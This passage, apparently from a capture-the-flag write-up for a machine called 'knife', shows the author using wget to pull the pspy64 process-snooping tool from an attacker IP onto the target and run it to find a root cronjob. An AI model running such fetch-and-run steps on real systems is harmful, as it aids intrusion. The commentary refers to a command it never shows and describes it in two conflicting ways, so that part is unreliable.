PSPY
A root cronjob process was discovered
james@knife:/tmp$ wget http://10.10.14.2/pspy64 ; chmod 755 /tmp/pspy64
--2023-04-06 15:15:43-- http://10.10.14.2/pspy64
connecting to 10.10.14.2:80... connected.
HTTP request sent, awaiting response... 200 OK
length: 3104768 (3.0M) [application/octet-stream]
saving to: ‘pspy64’
pspy64 100%[===================>] 2.96M 1.18MB/s in 2.5s
2023-04-06 15:15:46 (1.18 MB/s) - ‘pspy64’ saved [3104768/3104768]Delivery complete
james@knife:/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
doneExecuting PSPY
The root cronjob process is executing the command shown above
it seems to be deleting everything in the web root directory except for the index.php file
This command is running a Ruby script called knife which is a command-line tool for managing infrastructure and applications using the Chef configuration management system.
Specifically, this command is asking Knife to list all of the data bags that exist on the Chef server. Data bags are a feature in Chef that allow you to store and manage arbitrary data, such as configuration settings or secrets, separately from your cookbooks.
The command is using a specific version of Ruby that is included with Chef Workstation and disabling any gems (libraries) that may be installed by default to prevent conflicts with any other Ruby installation on the system.